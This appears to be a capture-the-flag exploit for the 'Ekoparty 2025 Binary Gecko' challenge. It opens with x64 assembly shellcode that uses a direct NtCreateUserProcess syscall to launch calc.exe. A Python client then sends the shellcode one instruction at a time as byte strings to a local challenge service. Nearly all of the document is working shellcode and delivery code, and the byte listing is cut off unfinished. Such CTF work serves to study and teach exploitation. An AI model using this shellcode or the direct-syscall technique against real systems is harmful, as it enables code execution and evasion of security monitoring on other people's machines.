mov qword ptr [rbx+03F0h], 0c58h
mov qword ptr [rbx+03F8h], 0
mov qword ptr [rbx+0400h], 0
mov qword ptr [rbx+0408h], 0
mov r15, qword ptr [rsp+02000h+01130h]
add rsp,02000h
; --- OBJECT_ATTRIBUTES ---
mov dword ptr [rsp+01020h], 030h
; --- PS_CREATE_INFO ---
mov qword ptr [rsp+01050h+0], 058h
mov byte ptr [rsp+1050+10h], 1
; --- allocate PS_ATTRIBUTE_LIST ---
mov [rsp+01138h], rax
lea rax, [rsp+0100h]
mov qword ptr [rsp+01138h], rax
mov rbx, rax
; Header total length
mov rax, 168
mov qword ptr [rbx+0], rax
; --- Attr 0: CLIENT_ID ---
mov qword ptr [rbx+8], 010003h
mov qword ptr [rbx+16], 10h
lea rax, [rsp+010A0h]
mov qword ptr [rbx+24], rax
mov qword ptr [rbx+32], 0
; --- Attr 1: IMAGE_INFO ---
mov qword ptr [rbx+40], 000006h
mov qword ptr [rbx+48], 40h
lea rax, [rsp+010B0h]
mov qword ptr [rbx+56], rax
mov qword ptr [rbx+64], 0
; --- Attr 2: IMAGE_NAME ---
mov qword ptr [rbx+72], 020005h
movzx rax, word ptr [rsp+0FC0h]
mov qword ptr [rbx+80], rax
mov rax, qword ptr [rsp+0FC0h+8]
mov qword ptr [rbx+88], rax
mov qword ptr [rbx+96], 0
; --- Attr 3: STD_HANDLE_INFO ---
mov qword ptr [rbx+104], 02000Ah
mov qword ptr [rbx+112], 8
lea rax, [rsp+01100h]
mov qword ptr [rbx+120], rax
mov qword ptr [rbx+128], 0
; --- Attr 4: MITIGATION_OPTIONS ---
; Policy alanı stack’te rsp + 0x1110’te
lea rax, [rsp+1110h]
mov word ptr [rax], 01000h
mov word ptr [rax+4], 0
mov qword ptr [rbx+136], 020010h ; Attribute: Mitigation Policy
mov qword ptr [rbx+144], 8 ; Size = 8
lea rax, [rsp+1110h]
mov qword ptr [rbx+152], rax ; Value = &Policy
mov qword ptr [rbx+160], 0
mov qword ptr [rbx+152], rax
mov qword ptr [rbx+160], 0
; --- call NtCreateUserProcess ---
lea rcx, [rsp+01120h]
lea rdx, [rsp+01128h]
mov r8d, 02000000h
mov r9d, 02000000h
lea rax, [rsp+01020h]
mov qword ptr [rsp+20h], rax
lea rax, [rsp+01020h]
mov qword ptr [rsp+28h], rax
mov dword ptr [rsp+30h], 0
mov dword ptr [rsp+38h], 0
mov rax, r15
mov qword ptr [rsp+40h], r15
lea rax, [rsp+01050h]
mov qword ptr [rsp+48h], rax
mov rax, qword ptr [rsp+01138h]
mov qword ptr [rsp+50h], rax
mov r10, rcx
mov eax, 0d1h
push r14
syscall
pop r14
; ABSOLUTE SHELLCODE
main ENDP
END
Compile it and get the opcodes.
Modern Era
import socket, struct, time
HOST = "127.0.0.1"
PORT = 20259
COOKIE = b"Ekoparty 2025 - Binary Gecko challenge\x00"
def send_seq_same_socket(payloads, timeout=5):
s = socket.socket()
s.settimeout(timeout)
s.connect((HOST, PORT))
s.sendall(COOKIE)
# consume greeting(s)
try: s.recv(4096)
except: pass
try: s.recv(4096)
except: pass
for payload in payloads:
s.sendall(struct.pack('<I', len(payload)))
s.sendall(payload)
# read server response (best-effort)
try:
resp = s.recv(4096)
print("<<<", resp.decode(errors='replace'))
except Exception as e:
print("recv err", e)
time.sleep(0.05)
s.close()
# seq from your disassembly — each entry = one instruction (bytes)
# seq from your disassembly — each entry = one instruction (bytes)
seq = [
#b'\x48\x83\xec\x08', # 0x000: sub rsp,0x8
b'\x48\x81\xec\x40\x11\x00\x00', # 0x004: sub rsp,0x1140
b'\x48\x8d\x9c\x24\x40\x07\x00\x00\x00', # 0x00b: lea rbx,[rsp+0x740]
b'\xc6\x03\x5c', # 0x013: mov BYTE PTR [rbx],0x5c
b'\xc6\x43\x01\x00', # 0x016: mov BYTE PTR [rbx+0x1],0x0
b'\xc6\x43\x02\x3f', # 0x01a: mov BYTE PTR [rbx+0x2],0x3f
b'\xc6\x43\x03\x00', # 0x01e: mov BYTE PTR [rbx+0x3],0x0
b'\xc6\x43\x04\x3f', # 0x022: mov BYTE PTR [rbx+0x4],0x3f
b'\xc6\x43\x05\x00', # 0x026: mov BYTE PTR [rbx+0x5],0x0
b'\xc6\x43\x06\x5c', # 0x02a: mov BYTE PTR [rbx+0x6],0x5c
b'\xc6\x43\x07\x00', # 0x02e: mov BYTE PTR [rbx+0x7],0x0
b'\xc6\x43\x08\x43', # 0x032: mov BYTE PTR [rbx+0x8],0x43
b'\xc6\x43\x09\x00', # 0x036: mov BYTE PTR [rbx+0x9],0x0
b'\xc6\x43\x0a\x3a', # 0x03a: mov BYTE PTR [rbx+0xa],0x3a
b'\xc6\x43\x0b\x00', # 0x03e: mov BYTE PTR [rbx+0xb],0x0
b'\xc6\x43\x0c\x5c', # 0x042: mov BYTE PTR [rbx+0xc],0x5c
b'\xc6\x43\x0d\x00', # 0x046: mov BYTE PTR [rbx+0xd],0x0
b'\xc6\x43\x0e\x57', # 0x04a: mov BYTE PTR [rbx+0xe],0x57
b'\xc6\x43\x0f\x00', # 0x04e: mov BYTE PTR [rbx+0xf],0x0
b'\xc6\x43\x10\x69', # 0x052: mov BYTE PTR [rbx+0x10],0x69
b'\xc6\x43\x11\x00', # 0x056: mov BYTE PTR [rbx+0x11],0x0
b'\xc6\x43\x12\x6e', # 0x05a: mov BYTE PTR [rbx+0x12],0x6e
b'\xc6\x43\x13\x00', # 0x05e: mov BYTE PTR [rbx+0x13],0x0
b'\xc6\x43\x14\x64', # 0x062: mov BYTE PTR [rbx+0x14],0x64
b'\xc6\x43\x15\x00', # 0x066: mov BYTE PTR [rbx+0x15],0x0
b'\xc6\x43\x16\x6f', # 0x06a: mov BYTE PTR [rbx+0x16],0x6f
b'\xc6\x43\x17\x00', # 0x06e: mov BYTE PTR [rbx+0x17],0x0
b'\xc6\x43\x18\x77', # 0x072: mov BYTE PTR [rbx+0x18],0x77
b'\xc6\x43\x19\x00', # 0x076: mov BYTE PTR [rbx+0x19],0x0
b'\xc6\x43\x1a\x73', # 0x07a: mov BYTE PTR [rbx+0x1a],0x73
b'\xc6\x43\x1b\x00', # 0x07e: mov BYTE PTR [rbx+0x1b],0x0
b'\xc6\x43\x1c\x5c', # 0x082: mov BYTE PTR [rbx+0x1c],0x5c
b'\xc6\x43\x1d\x00', # 0x086: mov BYTE PTR [rbx+0x1d],0x0
b'\xc6\x43\x1e\x53', # 0x08a: mov BYTE PTR [rbx+0x1e],0x53
b'\xc6\x43\x1f\x00', # 0x08e: mov BYTE PTR [rbx+0x1f],0x0
b'\xc6\x43\x20\x79', # 0x092: mov BYTE PTR [rbx+0x20],0x79
b'\xc6\x43\x21\x00', # 0x096: mov BYTE PTR [rbx+0x21],0x0
b'\xc6\x43\x22\x73', # 0x09a: mov BYTE PTR [rbx+0x22],0x73
b'\xc6\x43\x23\x00', # 0x09e: mov BYTE PTR [rbx+0x23],0x0
b'\xc6\x43\x24\x74', # 0x0a2: mov BYTE PTR [rbx+0x24],0x74
b'\xc6\x43\x25\x00', # 0x0a6: mov BYTE PTR [rbx+0x25],0x0
b'\xc6\x43\x26\x65', # 0x0aa: mov BYTE PTR [rbx+0x26],0x65
b'\xc6\x43\x27\x00', # 0x0ae: mov BYTE PTR [rbx+0x27],0x0
b'\xc6\x43\x28\x6d', # 0x0b2: mov BYTE PTR [rbx+0x28],0x6d
b'\xc6\x43\x29\x00', # 0x0b6: mov BYTE PTR [rbx+0x29],0x0
b'\xc6\x43\x2a\x33', # 0x0ba: mov BYTE PTR [rbx+0x2a],0x33
b'\xc6\x43\x2b\x00', # 0x0be: mov BYTE PTR [rbx+0x2b],0x0
b'\xc6\x43\x2c\x32', # 0x0c2: mov BYTE PTR [rbx+0x2c],0x32
b'\xc6\x43\x2d\x00', # 0x0c6: mov BYTE PTR [rbx+0x2d],0x0
b'\xc6\x43\x2e\x5c', # 0x0ca: mov BYTE PTR [rbx+0x2e],0x5c
b'\xc6\x43\x2f\x00', # 0x0ce: mov BYTE PTR [rbx+0x2f],0x0
b'\xc6\x43\x30\x63', # 0x0d2: mov BYTE PTR [rbx+0x30],0x63
b'\xc6\x43\x31\x00', # 0x0d6: mov BYTE PTR [rbx+0x31],0x0
b'\xc6\x43\x32\x61', # 0x0da: mov BYTE PTR [rbx+0x32],0x61
b'\xc6\x43\x33\x00', # 0x0de: mov BYTE PTR [rbx+0x33],0x0
b'\xc6\x43\x34\x6c', # 0x0e2: mov BYTE PTR [rbx+0x34],0x6c
b'\xc6\x43\x35\x00', # 0x0e6: mov BYTE PTR [rbx+0x35],0x0
b'\xc6\x43\x36\x63', # 0x0ea: mov BYTE PTR [rbx+0x36],0x63
b'\xc6\x43\x37\x00', # 0x0ee: mov BYTE PTR [rbx+0x37],0x0
b'\xc6\x43\x38\x2e', # 0x0f2: mov BYTE PTR [rbx+0x38],0x2e
b'\xc6\x43\x39\x00', # 0x0f6: mov BYTE PTR [rbx+0x39],0x0
b'\xc6\x43\x3a\x65', # 0x0fa: mov BYTE PTR [rbx+0x3a],0x65
b'\xc6\x43\x3b\x00', # 0x0fe: mov BYTE PTR [rbx+0x3b],0x0
b'\xc6\x43\x3c\x78', # 0x102: mov BYTE PTR [rbx+0x3c],0x78
b'\xc6\x43\x3d\x00', # 0x106: mov BYTE PTR [rbx+0x3d],0x0
b'\xc6\x43\x3e\x65', # 0x10a: mov BYTE PTR [rbx+0x3e],0x65
b'\xc6\x43\x3f\x00', # 0x10e: mov BYTE PTR [rbx+0x3f],0x0
b'\xc6\x43\x40\x00', # 0x112: mov BYTE PTR [rbx+0x40],0x0
b'\xc6\x43\x41\x00', # 0x116: mov BYTE PTR [rbx+0x41],0x0
b'\x48\x8d\x9c\x24\x40\x03\x00\x00', # 0x11a: lea rbx,[rsp+0x340]
b'\x48\x8d\x84\x24\x48\x07\x00\x00', # 0x122: lea rax,[rsp+0x748]
b'\x48\x89\x03', # 0x12a: mov QWORD PTR [rbx],rax
b'\x66\xc7\x84\x24\x60\x0f\x00\x00\x38\x00', # 0x12d: mov WORD PTR [rsp+0xf60],0x38
b'\x66\xc7\x84\x24\x62\x0f\x00\x00\x3a\x00', # 0x137: mov WORD PTR [rsp+0xf62],0x3a
b'\x48\x8d\x84\x24\x40\x03\x00\x00', # 0x141: lea rax,[rsp+0x340]
b'\x48\x89\x84\x24\x68\x0f\x00\x00', # 0x149: mov QWORD PTR [rsp+0xf68],rax
b'\x66\xc7\x84\x24\xc0\x0f\x00\x00\x40\x00', # 0x151: mov WORD PTR [rsp+0xfc0],0x40
b'\x66\xc7\x84\x24\xc2\x0f\x00\x00\x42\x00', # 0x15b: mov WORD PTR [rsp+0xfc2],0x42
b'\x48\x8d\x84\x24\x40\x07\x00\x00', # 0x165: lea rax,[rsp+0x740]
b'\x48\x89\x84\x24\xc8\x0f\x00\x00', # 0x16d: mov QWORD PTR [rsp+0xfc8],rax
b'\x66\xc7\x43\x32\x00\x00', # 0x175: mov WORD PTR [rbx+0x32],0x0
b'\x66\xc7\x43\x34\x02\x00', # 0x17b: mov WORD PTR [rbx+0x34],0x2
b'\x48\xc7\x43\x3a\x00\x00\x00\x00', # 0x181: mov QWORD PTR [rbx+0x3a],0x0
b'\x48\x8d\x9c\x24\x00\xe8\xff\xff', # 0x189: lea rbx,[rsp-0x2000]
b'\xc6\x03\x53', # 0x191: mov BYTE PTR [rbx],0x53
b'\xc6\x43\x01\x00', # 0x194: mov BYTE PTR [rbx+0x1],0x0
b'\xc6\x43\x02\x79', # 0x198: mov BYTE PTR [rbx+0x2],0x79
b'\xc6\x43\x03\x00', # 0x19c: mov BYTE PTR [rbx+0x3],0x0
b'\xc6\x43\x04\x73', # 0x1a0: mov BYTE PTR [rbx+0x4],0x73
b'\xc6\x43\x05\x00', # 0x1a4: mov BYTE PTR [rbx+0x5],0x0
b'\xc6\x43\x06\x74', # 0x1a8: mov BYTE PTR [rbx+0x6],0x74
b'\xc6\x43\x07\x00', # 0x1ac: mov BYTE PTR [rbx+0x7],0x0
b'\xc6\x43\x08\x65', # 0x1b0: mov BYTE PTR [rbx+0x8],0x65
b'\xc6\x43\x09\x00', # 0x1b4: mov BYTE PTR [rbx+0x9],0x0
b'\xc6\x43\x0a\x6d', # 0x1b8: mov BYTE PTR [rbx+0xa],0x6d
b'\xc6\x43\x0b\x00', # 0x1bc: mov BYTE PTR [rbx+0xb],0x0
b'\xc6\x43\x0c\x52', # 0x1c0: mov BYTE PTR [rbx+0xc],0x52
b'\xc6\x43\x0d\x00', # 0x1c4: mov BYTE PTR [rbx+0xd],0x0
b'\xc6\x43\x0e\x6f', # 0x1c8: mov BYTE PTR [rbx+0xe],0x6f
b'\xc6\x43\x0f\x00', # 0x1cc: mov BYTE PTR [rbx+0xf],0x0
b'\xc6\x43\x10\x6f', # 0x1d0: mov BYTE PTR [rbx+0x10],0x6f
b'\xc6\x43\x11\x00', # 0x1d4: mov BYTE PTR [rbx+0x11],0x0
b'\xc6\x43\x12\x74', # 0x1d8: mov BYTE PTR [rbx+0x12],0x74
b'\xc6\x43\x13\x00', # 0x1dc: mov BYTE PTR [rbx+0x13],0x0
b'\xc6\x43\x14\x3d', # 0x1e0: mov BYTE PTR [rbx+0x14],0x3d
b'\xc6\x43\x15\x00', # 0x1e4: mov BYTE PTR [rbx+0x15],0x0
b'\xc6\x43\x16\x43', # 0x1e8: mov BYTE PTR [rbx+0x16],0x43
b'\xc6\x43\x17\x00', # 0x1ec: mov BYTE PTR [rbx+0x17],0x0
b'\xc6\x43\x18\x3a', # 0x1f0: mov BYTE PTR [rbx+0x18],0x3a
b'\xc6\x43\x19\x00', # 0x1f4: mov BYTE PTR [rbx+0x19],0x0
b'\xc6\x43\x1a\x5c', # 0x1f8: mov BYTE PTR [rbx+0x1a],0x5c
b'\xc6\x43\x1b\x00', # 0x1fc: mov BYTE PTR [rbx+0x1b],0x0
b'\xc6\x43\x1c\x57', # 0x200: mov BYTE PTR [rbx+0x1c],0x57
b'\xc6\x43\x1d\x00', # 0x204: mov BYTE PTR [rbx+0x1d],0x0
b'\xc6\x43\x1e\x69', # 0x208: mov BYTE PTR [rbx+0x1e],0x69
b'\xc6\x43\x1f\x00', # 0x20c: mov BYTE PTR [rbx+0x1f],0x0
b'\xc6\x43\x20\x6e', # 0x210: mov BYTE PTR [rbx+0x20],0x6e
b'\xc6\x43\x21\x00', # 0x214: mov BYTE PTR [rbx+0x21],0x0
b'\xc6\x43\x22\x64', # 0x218: mov BYTE PTR [rbx+0x22],0x64
b'\xc6\x43\x23\x00', # 0x21c: mov BYTE PTR [rbx+0x23],0x0
b'\xc6\x43\x24\x6f', # 0x220: mov BYTE PTR [rbx+0x24],0x6f
b'\xc6\x43\x25\x00', # 0x224: mov BYTE PTR [rbx+0x25],0x0
b'\xc6\x43\x26\x77', # 0x228: mov BYTE PTR [rbx+0x26],0x77
b'\xc6\x43\x27\x00', # 0x22c: mov BYTE PTR [rbx+0x27],0x0
b'\xc6\x43\x28\x73', # 0x230: mov BYTE PTR [rbx+0x28],0x73
b'\xc6\x43\x29\x00', # 0x234: mov BYTE PTR [rbx+0x29],0x0
b'\xc6\x43\x2a\x00', # 0x238: mov BYTE PTR [rbx+0x2a],0x0
b'\xc6\x43\x2b\x00', # 0x23c: mov BYTE PTR [rbx+0x2b],0x0
b'\xc6\x43\x2c\x00', # 0x240: mov BYTE PTR [rbx+0x2c],0x0
b'\xc6\x43\x2d\x00', # 0x244: mov BYTE PTR [rbx+0x2d],0x0
b'\x48\x8d\x9c\x24\x40\x0b\x00\x00', # 0x248: lea rbx,[rsp+0xb40]
b'\xc6\x03\x43', # 0x250: mov BYTE PTR [rbx],0x43
b'\xc6\x43\x01\x00', # 0x253: mov BYTE PTR [rbx+0x1],0x0
b'\xc6\x43\x02\x3a', # 0x257: mov BYTE PTR [rbx+0x2],0x3a
b'\xc6\x43\x03\x00', # 0x25b: mov BYTE PTR [rbx+0x3],0x0
b'\xc6\x43\x04\x5c', # 0x25f: mov BYTE PTR [rbx+0x4],0x5c
b'\xc6\x43\x05\x00', # 0x263: mov BYTE PTR [rbx+0x5],0x0
b'\xc6\x43\x06\x00', # 0x267: mov BYTE PTR [rbx+0x6],0x0
b'\xc6\x43\x07\x00', # 0x26b: mov BYTE PTR [rbx+0x7],0x0
b'\x48\x81\xec\x00\x20\x00\x00', # 0x26f: sub rsp,0x1000
b'\x48\x8d\x1c\x24', # 0x276: lea rbx,[rsp]
b'\x48\x89\x9c\x24\x30\x31\x00\x00', # 0x27a: mov QWORD PTR [rsp+0x2130],rbx
b'\xc7\x03\xb0\x06\x00\x00', # 0x282: mov DWORD PTR [rbx],0x6b0
b'\xc7\x43\x04\xb0\x06\x00\x00', # 0x288: mov DWORD PTR [rbx+0x4],0x6b0
b'\x48\xc7\x43\x08\x01\x00\x00\x00', # 0x28f: mov QWORD PTR [rbx+0x8],0x1
b'\x48\xc7\x43\x10\x00\x00\x00\x00', # 0x297: mov QWORD PTR [rbx+0x10],0x0
b'\x48\xc7\x43\x18\x00\x00\x00\x00', # 0x29f: mov QWORD PTR [rbx+0x18],0x0
b'\x48\xc7\x43\x20\x00\x00\x00\x00', # 0x2a7: mov QWORD PTR [rbx+0x20],0x0
b'\x48\xc7\x43\x28\x00\x00\x00\x00', # 0x2af: mov QWORD PTR [rbx+0x28],0x0
b'\x48\xc7\x43\x30\x00\x00\x00\x00', # 0x2b7: mov QWORD PTR [rbx+0x30],0x0
b'\x48\xc7\x43\x38\x00\x00\x00\x00', # 0x2bf: mov QWORD PTR [rbx+0x38],0x0
b'\x48\x8d\x84\x24\x40\x2b\x00\x00', # 0x2c7: lea rax,[rsp+0x1b40]
b'\x48\x89\x43\x40', # 0x2cf: mov QWORD PTR [rbx+0x40],rax
b'\x48\xc7\x43\x48\x00\x00\x00\x00', # 0x2d3: mov QWORD PTR [rbx+0x48],0x0
b'\x48\xc7\x43\x50\x00\x00\x00\x00', # 0x2db: mov QWORD PTR [rbx+0x50],0x0
b'\x48\xc7\x43\x58\x00\x00\x00\x00', # 0x2e3: mov QWORD PTR [rbx+0x58],0x0
b'\x48\xc7\x43\x60\x38\x00\x3a\x00', # 0x2eb: mov QWORD PTR [rbx+0x60],0x3a0038
b'\x48\x8d\x84\x24\x40\x23\x00\x00', # 0x2f3: lea rax,[rsp+0x1340]
b'\x48\x89\x84\x24\x00\x20\x00\x00', # 0x2fb: mov QWORD PTR [rsp+0x1000],rax
b'\x48\x89\x84\x24\x08\x20\x00\x00', # 0x303: mov QWORD PTR [rsp+0x1008],rax
b'\x48\x8d\x84\x24\x00\x20\x00\x00', # 0x30b: lea rax,[rsp+0x1000]
b'\x48\x89\x43\x68', # 0x313: mov QWORD PTR [rbx+0x68],rax
b'\x48\xc7\x43\x70\x00\x00\x00\x00', # 0x317: mov QWORD PTR [rbx+0x70],0x0
b'\x48\x8d\x03', # 0x31f: lea rax,[rbx]
b'\x48\x8d\x84\x24\x80\x20\x00\x00', # 0x322: lea rax,[rsp+0x1080]
b'\x48\x89\x84\x24\x80\x20\x00\x00', # 0x32a: mov QWORD PTR [rsp+0x1080],rax
b'\x48\x89\x84\x24\x88\x20\x00\x00', # 0x332: mov QWORD PTR [rsp+0x1088],rax
b'\x48\x8d\x84\x24\x80\x20\x00\x00', # 0x33a: lea rax,[rsp+0x1080]
b'\x48\x89\x43\x78', # 0x342: mov QWORD PTR [rbx+0x78],rax
b'\x48\x8d\x84\x24\x00\x08\x00\x00', # 0x346: lea rax,[rsp-0x1000]
b'\x48\x89\x83\x80\x00\x00\x00', # 0x34e: mov QWORD PTR [rbx+0x80],rax
b'\x48\xc7\x83\x88\x00\x00\x00\x00\x00\x00\x00', # 0x355: mov QWORD PTR [rbx+0x88],0x0
b'\x48\xc7\x83\x90\x00\x00\x00\x00\x00\x00\x00', # 0x360: mov QWORD PTR [rbx+0x90],0x0
b'\x48\xc7\x83\x98\x00\x00\x00\x00\x00\x00\x00', # 0x36b: mov QWORD PTR [rbx+0x98],0x0
b'\x48\xc7\x83\xa0\x00\x00\x00\x00\x00\x00\x00', # 0x376: mov QWORD PTR [rbx+0xa0],0x0
b'\x48\xc7\x83\xa8\x00\x00\x00\x00\x00\x00\x00', # 0x381: mov QWORD PTR [rbx+0xa8],0x0
b'\x48\xc7\x83\xb0\x00\x00\x00\x00\x00\x00\x00', # 0x38c: mov QWORD PTR [rbx+0xb0],0x0
b'\x48\xc7\x83\xb8\x00\x00\x00\x00\x00\x00\x00', # 0x397: mov QWORD PTR [rbx+0xb8],0x0
b'\x48\xc7\x83\xc0\x00\x00\x00\x00\x00\x00\x00', # 0x3a2: mov QWORD PTR [rbx+0xc0],0x0
b'\x48\xc7\x83\xc8\x00\x00\x00\x00\x00\x00\x00', # 0x3ad: mov QWORD PTR [rbx+0xc8],0x0
b'\x48\xc7\x83\xd0\x00\x00\x00\x00\x00\x00\x00', # 0x3b8: mov QWORD PTR [rbx+0xd0],0x0
b'\x48\xc7\x83\xd8\x00\x00\x00\x00\x00\x00\x00', # 0x3c3: mov QWORD PTR [rbx+0xd8],0x0
b'\x48\xc7\x83\xe0\x00\x00\x00\x00\x00\x00\x00', # 0x3ce: mov QWORD PTR [rbx+0xe0],0x0
b'\x48\xc7\x83\xe8\x00\x00\x00\x00\x00\x00\x00', # 0x3d9: mov QWORD PTR [rbx+0xe8],0x0
b'\x48\xc7\x83\xf0\x00\x00\x00\x00\x00\x00\x00', # 0x3e4: mov QWORD PTR [rbx+0xf0],0x0
b'\x48\xc7\x83\xf8\x00\x00\x00\x00\x00\x00\x00', # 0x3ef: mov QWORD PTR [rbx+0xf8],0x0
b'\x48\xc7\x83\x00\x01\x00\x00\x00\x00\x00\x00', # 0x3fa: mov QWORD PTR [rbx+0x100],0x0
b'\x48\xc7\x83\x08\x01\x00\x00\x00\x00\x00\x00', # 0x405: mov QWORD PTR [rbx+0x108],0x0
b'\x48\xc7\x83\x10\x01\x00\x00\x00\x00\x00\x00', # 0x410: mov QWORD PTR [rbx+0x110],0x0
b'\x48\xc7\x83\x18\x01\x00\x00\x00\x00\x00\x00', # 0x41b: mov QWORD PTR [rbx+0x118],0x0
b'\x48\xc7\x83\x20\x01\x00\x00\x00\x00\x00\x00', # 0x426: mov QWORD PTR [rbx+0x120],0x0
b'\x48\xc7\x83\x28\x01\x00\x00\x00\x00\x00\x00', # 0x431: mov QWORD PTR [rbx+0x128],0x0
b'\x48\xc7\x83\x30\x01\x00\x00\x00\x00\x00\x00', # 0x43c: mov QWORD PTR [rbx+0x130],0x0
b'\x48\xc7\x83\x38\x01\x00\x00\x00\x00\x00\x00', # 0x447: mov QWORD PTR [rbx+0x138],0x0
b'\x48\xc7\x83\x40\x01\x00\x00\x00\x00\x00\x00', # 0x452: mov QWORD PTR [rbx+0x140],0x0
b'\x48\xc7\x83\x48\x01\x00\x00\x00\x00\x00\x00', # 0x45d: mov QWORD PTR [rbx+0x148],0x0
b'\x48\xc7\x83\x50\x01\x00\x00\x00\x00\x00\x00', # 0x468: mov QWORD PTR [rbx+0x150],0x0
b'\x48\xc7\x83\x58\x01\x00\x00\x00\x00\x00\x00', # 0x473: mov QWORD PTR [rbx+0x158],0x0
b'\x48\xc7\x83\x60\x01\x00\x00\x00\x00\x00\x00', # 0x47e: mov QWORD PTR [rbx+0x160],0x0
b'\x48\xc7\x83\x68\x01\x00\x00\x00\x00\x00\x00', # 0x489: mov QWORD PTR [rbx+0x168],0x0
b'\x48\xc7\x83\x70\x01\x00\x00\x00\x00\x00\x00', # 0x494: mov QWORD PTR [rbx+0x170],0x0
b'\x48\xc7\x83\x78\x01\x00\x00\x00\x00\x00\x00', # 0x49f: mov QWORD PTR [rbx+0x178],0x0
b'\x48\xc7\x83\x80\x01\x00\x00\x00\x00\x00\x00', # 0x4aa: mov QWORD PTR [rbx+0x180],0x0
b'\x48\xc7\x83\x88\x01\x00\x00\x00\x00\x00\x00', # 0x4b5: mov QWORD PTR [rbx+0x188],0x0
b'\x48\xc7\x83\x90\x01\x00\x00\x00\x00\x00\x00', # 0x4c0: mov QWORD PTR [rbx+0x190],0x0
b'\x48\xc7\x83\x98\x01\x00\x00\x00\x00\x00\x00', # 0x4cb: mov QWORD PTR [rbx+0x198],0x0
b'\x48\xc7\x83\xa0\x01\x00\x00\x00\x00\x00\x00', # 0x4d6: mov QWORD PTR [rbx+0x1a0],0x0
b'\x48\xc7\x83\xa8\x01\x00\x00\x00\x00\x00\x00', # 0x4e1: mov QWORD PTR [rbx+0x1a8],0x0
b'\x48\xc7\x83\xb0\x01\x00\x00\x00\x00\x00\x00', # 0x4ec: mov QWORD PTR [rbx+0x1b0],0x0
b'\x48\xc7\x83\xb8\x01\x00\x00\x00\x00\x00\x00', # 0x4f7: mov QWORD PTR [rbx+0x1b8],0x0
b'\x48\xc7\x83\xc0\x01\x00\x00\x00\x00\x00\x00', # 0x502: mov QWORD PTR [rbx+0x1c0],0x0
b'\x48\xc7\x83\xc8\x01\x00\x00\x00\x00\x00\x00', # 0x50d: mov QWORD PTR [rbx+0x1c8],0x0
b'\x48\xc7\x83\xd0\x01\x00\x00\x00\x00\x00\x00', # 0x518: mov QWORD PTR [rbx+0x1d0],0x0
b'\x48\xc7\x83\xd8\x01\x00\x00\x00\x00\x00\x00', # 0x523: mov QWORD PTR [rbx+0x1d8],0x0
b'\x48\xc7\x83\xe0\x01\x00\x00\x00\x00\x00\x00', # 0x52e: mov QWORD PTR [rbx+0x1e0],0x0
b'\x48\xc7\x83\xe8\x01\x00\x00\x00\x00\x00\x00', # 0x539: mov QWORD PTR [rbx+0x1e8],0x0
b'\x48\xc7\x83\xf0\x01\x00\x00\x00\x00\x00\x00', # 0x544: mov QWORD PTR [rbx+0x1f0],0x0
b'\x48\xc7\x83\xf8\x01\x00\x00\x00\x00\x00\x00', # 0x54f: mov QWORD PTR [rbx+0x1f8],0x0
b'\x48\xc7\x83\x00\x02\x00\x00\x00\x00\x00\x00', # 0x55a: mov QWORD PTR [rbx+0x200],0x0
b'\x48\xc7\x83\x08\x02\x00\x00\x00\x00\x00\x00', # 0x565: mov QWORD PTR [rbx+0x208],0x0
b'\x48\xc7\x83\x10\x02\x00\x00\x00\x00\x00\x00', # 0x570: mov QWORD PTR [rbx+0x210],0x0
b'\x48\xc7\x83\x18\x02\x00\x00\x00\x00\x00\x00', # 0x57b: mov QWORD PTR [rbx+0x218],0x0
b'\x48\xc7\x83\x20\x02\x00\x00\x00\x00\x00\x00', # 0x586: mov QWORD PTR [rbx+0x220],0x0
b'\x48\xc7\x83\x28\x02\x00\x00\x00\x00\x00\x00', # 0x591: mov QWORD PTR [rbx+0x228],0x0
b'\x48\xc7\x83\x30\x02\x00\x00\x00\x00\x00\x00', # 0x59c: mov QWORD PTR [rbx+0x230],0x0
b'\x48\xc7\x83\x38\x02\x00\x00\x00\x00\x00\x00', # 0x5a7: mov QWORD PTR [rbx+0x238],0x0
b'\x48\xc7\x83\x40\x02\x00\x00\x00\x00\x00\x00', # 0x5b2: mov QWORD PTR [rbx+0x240],0x0
b'\x48\xc7\x83\x48\x02\x00\x00\x00\x00\x00\x00', # 0x5bd: mov QWORD PTR [rbx+0x248],0x0
b'\x48\xc7\x83\x50\x02\x00\x00\x00\x00\x00\x00', # 0x5c8: mov QWORD PTR [rbx+0x250],0x0
b'\x48\xc7\x83\x58\x02\x00\x00\x00\x00\x00\x00', # 0x5d3: mov QWORD PTR [rbx+0x258],0x0
b'\x48\xc7\x83\x60\x02\x00\x00\x00\x00\x00\x00', # 0x5de: mov QWORD PTR [rbx+0x260],0x0
b'\x48\xc7\x83\x68\x02\x00\x00\x00\x00\x00\x00', # 0x5e9: mov QWORD PTR [rbx+0x268],0x0
b'\x48\xc7\x83\x70\x02\x00\x00\x00\x00\x00\x00', # 0x5f4: mov QWORD PTR [rbx+0x270],0x0
b'\x48\xc7\x83\x78\x02\x00\x00\x00\x00\x00\x00', # 0x5ff: mov QWORD PTR [rbx+0x278],0x0
b'\x48\xc7\x83\x80\x02\x00\x00\x00\x00\x00\x00', # 0x60a: mov QWORD PTR [rbx+0x280],0x0
b'\x48\xc7\x83\x88\x02\x00\x00\x00\x00\x00\x00', # 0x615: mov QWORD PTR [rbx+0x288],0x0
b'\x48\xc7\x83\x90\x02\x00\x00\x00\x00\x00\x00', # 0x620: mov QWORD PTR [rbx+0x290],0x0
b'\x48\xc7\x83\x98\x02\x00\x00\x00\x00\x00\x00', # 0x62b: mov QWORD PTR [rbx+0x298],0x0
b'\x48\xc7\x83\xa0\x02\x00\x00\x00\x00\x00\x00', # 0x636: mov QWORD PTR [rbx+0x2a0],0x0
b'\x48\xc7\x83\xa8\x02\x00\x00\x00\x00\x00\x00', # 0x641: mov QWORD PTR [rbx+0x2a8],0x0
b'\x48\xc7\x83\xb0\x02\x00\x00\x00\x00\x00\x00', # 0x64c: mov QWORD PTR [rbx+0x2b0],0x0
b'\x48\xc7\x83\xb8\x02\x00\x00\x00\x00\x00\x00', # 0x657: mov QWORD PTR [rbx+0x2b8],0x0
b'\x48\xc7\x83\xc0\x02\x00\x00\x00\x00\x00\x00', # 0x662: mov QWORD PTR [rbx+0x2c0],0x0
b'\x48\xc7\x83\xc8\x02\x00\x00\x00\x00\x00\x00', # 0x66d: mov QWORD PTR [rbx+0x2c8],0x0
b'\x48\xc7\x83\xd0\x02\x00\x00\x00\x00\x00\x00', # 0x678: mov QWORD PTR [rbx+0x2d0],0x0
b'\x48\xc7\x83\xd8\x02\x00\x00\x00\x00\x00\x00', # 0x683: mov QWORD PTR [rbx+0x2d8],0x0
b'\x48\xc7\x83\xe0\x02\x00\x00\x00\x00\x00\x00', # 0x68e: mov QWORD PTR [rbx+0x2e0],0x0
